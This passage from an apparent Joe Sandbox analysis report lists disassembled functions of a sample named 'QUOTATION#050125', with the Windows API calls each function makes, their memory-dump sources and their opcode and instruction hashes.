                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                      • String ID:
                                                                                      • API String ID: 2759813231-0
                                                                                      • Opcode ID: 8f743b7c2b4f9e8a555c16edeccf8038bce29b0599a80964236b2615df1a6f5f
                                                                                      • Instruction ID: e39e0f7ba58f6ddae5272824f5c4e81efb0b9350a501799bd9d0c371b9ad6cf0
                                                                                      • Opcode Fuzzy Hash: 8f743b7c2b4f9e8a555c16edeccf8038bce29b0599a80964236b2615df1a6f5f
                                                                                      • Instruction Fuzzy Hash: 53314371D00249AFD700DFA9C881DEEB7F9EF48304B50806DE425E7212D7359E45CBA0
                                                                                      Function 00124C7D Relevance: 6.1, APIs: 4, Instructions: 87windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • IsWindowVisible.USER32(?), ref: 00124C95
                                                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00124CB2
                                                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00124CEA
                                                                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00124D10
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2796087071-0
                                                                                      • Opcode ID: 83b911149372ed23573e7697654fed7eed3101a1fb8a3a38f5a01eb49955d7de
                                                                                      • Instruction ID: 8dbd6ce5c9765f034e19d983246c83c806fb076ffc363d4126ffb37a6d0fba78
                                                                                      • Opcode Fuzzy Hash: 83b911149372ed23573e7697654fed7eed3101a1fb8a3a38f5a01eb49955d7de
                                                                                      • Instruction Fuzzy Hash: 4C210472204325BFEB155B79AC09EBB7B9CDF55750F10802AF809DA292EB61CD5086A0
                                                                                      Function 0012D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 0012D501
                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0012D50F
                                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 0012D52F
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0012D5DC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                      • String ID:
                                                                                      • API String ID: 420147892-0
                                                                                      • Opcode ID: d8ed9a6e2a6477c1b38bfc6fec1bc0bdeadb55696fb5976f950ce7e7fbd090d6
                                                                                      • Instruction ID: 89d8c9e9ba4e58502fd5f0b023bf39af2253e79737c76553f1c4cda71f1892f0
                                                                                      • Opcode Fuzzy Hash: d8ed9a6e2a6477c1b38bfc6fec1bc0bdeadb55696fb5976f950ce7e7fbd090d6
                                                                                      • Instruction Fuzzy Hash: 3D317E711083019FD300EF54E885EAFBBF8EF99354F54092DF581861A2EB719999CBA2
                                                                                      Function 00158FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 000D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 000D9BB2
                                                                                      • GetCursorPos.USER32(?), ref: 00159001
                                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00117711,?,?,?,?,?), ref: 00159016
                                                                                      • GetCursorPos.USER32(?), ref: 0015905E
                                                                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00117711,?,?,?), ref: 00159094
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2864067406-0
                                                                                      • Opcode ID: 154f570a801746f7022aeb44770450b0f631019da8c63c48abe7b944f6167111
                                                                                      • Instruction ID: cf22a47d30bdf5b855917b3c525a431db38ae4eff93a76b6030cb80bf5059dec
                                                                                      • Opcode Fuzzy Hash: 154f570a801746f7022aeb44770450b0f631019da8c63c48abe7b944f6167111
                                                                                      • Instruction Fuzzy Hash: 86219F35600118FFCB258F94CC58EEB7BB9EB49352F044555F9154F2A1D3319990EBA1
                                                                                      Function 0012D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetFileAttributesW.KERNEL32(?,0015CB68), ref: 0012D2FB
                                                                                      • GetLastError.KERNEL32 ref: 0012D30A
                                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 0012D319
                                                                                      • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0015CB68), ref: 0012D376
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                      • String ID:
                                                                                      • API String ID: 2267087916-0
                                                                                      • Opcode ID: d5ee4f367fc8018aa335a6c7d8160afedbb6ac53f1de3e25a82a43e1c01cae98
                                                                                      • Instruction ID: 7de5004ab907fa81fbd86cfe9ee96c98003c06da25edb7d2fe8a1c59cbf8080e
                                                                                      • Opcode Fuzzy Hash: d5ee4f367fc8018aa335a6c7d8160afedbb6ac53f1de3e25a82a43e1c01cae98
                                                                                      • Instruction Fuzzy Hash: 0F218DB0508311DF8310DF28E8859AE77E4FF56364F504A1DF499C72A2DB309959CB93
                                                                                      Function 00152782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0015280A
                                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00152824
                                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00152832
                                                                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00152840
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Long$AttributesLayered
                                                                                      • String ID:
                                                                                      • API String ID: 2169480361-0
                                                                                      • Opcode ID: c6feff818dac38580cb7d97013fde1e67b7a5804c3f36c7ff2cd93fe8ce1a405
                                                                                      • Instruction ID: 31bba675f517956098f32396970f04f6ead17580ba6388db52125dfec78a8eab
                                                                                      • Opcode Fuzzy Hash: c6feff818dac38580cb7d97013fde1e67b7a5804c3f36c7ff2cd93fe8ce1a405
                                                                                      • Instruction Fuzzy Hash: 89219032204611EFD714DB24C845FAA7B95AF56325F14815CF8268F6A2C771EC86C7D0
                                                                                      Function 001278F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00128D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0012790A,?,000000FF,?,00128754,00000000,?,0000001C,?,?), ref: 00128D8C
                                                                                        • Part of subcall function 00128D7D: lstrcpyW.KERNEL32(00000000,?,?,0012790A,?,000000FF,?,00128754,00000000,?,0000001C,?,?,00000000), ref: 00128DB2
                                                                                        • Part of subcall function 00128D7D: lstrcmpiW.KERNEL32(00000000,?,0012790A,?,000000FF,?,00128754,00000000,?,0000001C,?,?), ref: 00128DE3
                                                                                      • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00128754,00000000,?,0000001C,?,?,00000000), ref: 00127923
                                                                                      • lstrcpyW.KERNEL32(00000000,?,?,00128754,00000000,?,0000001C,?,?,00000000), ref: 00127949
                                                                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,00128754,00000000,?,0000001C,?,?,00000000), ref: 00127984
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: lstrcmpilstrcpylstrlen
                                                                                      • String ID: cdecl
                                                                                      • API String ID: 4031866154-3896280584
                                                                                      • Opcode ID: 323cc05a2f09ad445fa057f39656635406c25010f43dffaf029684e3ed241157
                                                                                      • Instruction ID: d70b34c5b0f10afbbbd4f46f774ee419498087b9d379920309a3baf5129099bb
                                                                                      • Opcode Fuzzy Hash: 323cc05a2f09ad445fa057f39656635406c25010f43dffaf029684e3ed241157
                                                                                      • Instruction Fuzzy Hash: DA11063A200352AFCF156F34E844D7B77A5FF45364B00402AF906CB3A4EB319861C7A1
                                                                                      Function 00157CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00157D0B
                                                                                      • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00157D2A
                                                                                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00157D42
                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0013B7AD,00000000), ref: 00157D6B
                                                                                        • Part of subcall function 000D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 000D9BB2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Long
                                                                                      • String ID:
                                                                                      • API String ID: 847901565-0
                                                                                      • Opcode ID: b07def83a732ce2c5b7493330ad9c766716cb3200f902db2e6d88344ddbb0e62
                                                                                      • Instruction ID: 5a7aff582a56e7f79f0d2a86fb57e34c2a14909572f3aea7f97950f7522ef3d5
                                                                                      • Opcode Fuzzy Hash: b07def83a732ce2c5b7493330ad9c766716cb3200f902db2e6d88344ddbb0e62
                                                                                      • Instruction Fuzzy Hash: CB11CD31214755EFCB108FA8EC04AAA3BA5BF45362B114729FC39DB2F0E7319994CB90
                                                                                      Function 000FCDBD Relevance: 6.1, APIs: 4, Instructions: 68COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 000FCDC6
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000FCDE9
                                                                                        • Part of subcall function 000F3820: RtlAllocateHeap.NTDLL(00000000,?,00191444,?,000DFDF5,?,?,000CA976,00000010,00191440,000C13FC,?,000C13C6,?,000C1129), ref: 000F3852
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 000FCE0F
                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 000FCE31
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1794362364-0
                                                                                      • Opcode ID: 129ce3d3142454bae41996a5b0f83150edbe35a1f94bdf442cc4c534a3d591ae
                                                                                      • Instruction ID: 88b53ea378201cdbf88c493156b1c0ab93c8abd9dec09650e4ce2ad4cb158033
                                                                                      • Opcode Fuzzy Hash: 129ce3d3142454bae41996a5b0f83150edbe35a1f94bdf442cc4c534a3d591ae
                                                                                      • Instruction Fuzzy Hash: 22018872A0171DBF33611A7A6D89DBF79ADEFC6BA13150129FA05C7901DA618D01A1F0
                                                                                      Function 00121A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00121A47
                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00121A59
                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00121A6F
                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00121A8A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      • Opcode ID: 811310a1a073faea1d2f31a124a8ff5fb0b913483f95f63b88b2af4e1bb4b92e
                                                                                      • Instruction ID: 2a1c6cc10cb1535b7567c54c1578c6e0190e2377408007e2864dc69f3e32ea59
                                                                                      • Opcode Fuzzy Hash: 811310a1a073faea1d2f31a124a8ff5fb0b913483f95f63b88b2af4e1bb4b92e
                                                                                      • Instruction Fuzzy Hash: 7411273A901229FFEB10DBA4C985FADBB79EB18750F2000A1EA00B7290D7716E50DB94
                                                                                      Function 0012E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0012E1FD
                                                                                      • MessageBoxW.USER32(?,?,?,?), ref: 0012E230
                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0012E246
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0012E24D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                      • String ID:
                                                                                      • API String ID: 2880819207-0
                                                                                      • Opcode ID: 3d734a48f17922cf81408f9437a9ed0347efa1c29a1790564d02ed5847dd1a2a
                                                                                      • Instruction ID: 4b048ef6537beb9f3771a9c4f19a2ca6e3e785e662c5c371fd38efd24893f06f
                                                                                      • Opcode Fuzzy Hash: 3d734a48f17922cf81408f9437a9ed0347efa1c29a1790564d02ed5847dd1a2a
                                                                                      • Instruction Fuzzy Hash: 36110876904365FFC7019FA8AC05A9E7FADEB45321F10421AF925E7691D3708A808BA0
                                                                                      Function 00159EF3 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 000D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 000D9BB2
                                                                                      • GetClientRect.USER32(?,?), ref: 00159F31
                                                                                      • GetCursorPos.USER32(?), ref: 00159F3B
                                                                                      • ScreenToClient.USER32(?,?), ref: 00159F46
                                                                                      • DefDlgProcW.USER32(?,00000020,?,00000000,?,?,?), ref: 00159F7A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Client$CursorLongProcRectScreenWindow
                                                                                      • String ID:
                                                                                      • API String ID: 4127811313-0
                                                                                      • Opcode ID: 7d27850be2ca19ba5cd471b81016308e304606d0160971b6c243623f448f5e5e
                                                                                      • Instruction ID: 3af81749f620605511d4e4df0fb64f1527545c141a53049cebc88f816d47ae4e
                                                                                      • Opcode Fuzzy Hash: 7d27850be2ca19ba5cd471b81016308e304606d0160971b6c243623f448f5e5e
                                                                                      • Instruction Fuzzy Hash: F911183290021AEFDB10DFA9D8859EE7BB9FB45312F400456F921EB551D730BA85CBE2
                                                                                      Function 000C600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 000C604C
                                                                                      • GetStockObject.GDI32(00000011), ref: 000C6060
                                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 000C606A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateMessageObjectSendStockWindow
                                                                                      • String ID:
                                                                                      • API String ID: 3970641297-0
                                                                                      • Opcode ID: 43ad090990e3f323d80fdff850e9843c3206a44b05aad776b21f13872f2660f9
                                                                                      • Instruction ID: 1287eeaf26e87f2f87df580236384bf742f0935efe4cb483226055f0253edbeb
                                                                                      • Opcode Fuzzy Hash: 43ad090990e3f323d80fdff850e9843c3206a44b05aad776b21f13872f2660f9
                                                                                      • Instruction Fuzzy Hash: DA115E72501609FFEF224F949C54FEF7BA9EF1C355F150115FA1466150D732ACA09B90
                                                                                      Function 000F3073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,000C13C6,00000000,00000000,?,000F301A,000C13C6,00000000,00000000,00000000,?,000F328B,00000006,FlsSetValue), ref: 000F30A5
                                                                                      • GetLastError.KERNEL32(?,000F301A,000C13C6,00000000,00000000,00000000,?,000F328B,00000006,FlsSetValue,00162290,FlsSetValue,00000000,00000364,?,000F2E46), ref: 000F30B1
                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,000F301A,000C13C6,00000000,00000000,00000000,?,000F328B,00000006,FlsSetValue,00162290,FlsSetValue,00000000), ref: 000F30BF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 3177248105-0
                                                                                      • Opcode ID: ff07ab37262f860fc2557e2879dcb3638503e50973fbb78ceb9241d9035d9ae2
                                                                                      • Instruction ID: 53ac30f2727a46e474d74fc2f41a2414431a5e6f4fad5538246ab4a681c15bc7
                                                                                      • Opcode Fuzzy Hash: ff07ab37262f860fc2557e2879dcb3638503e50973fbb78ceb9241d9035d9ae2
                                                                                      • Instruction Fuzzy Hash: 0801D43230132AEFCB714AB99C54A7B7BD8AF05BB1B100621FA05E7A40CF21D981D6E0
                                                                                      Function 00127464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0012747F
                                                                                      • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00127497
                                                                                      • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 001274AC
                                                                                      • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 001274CA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
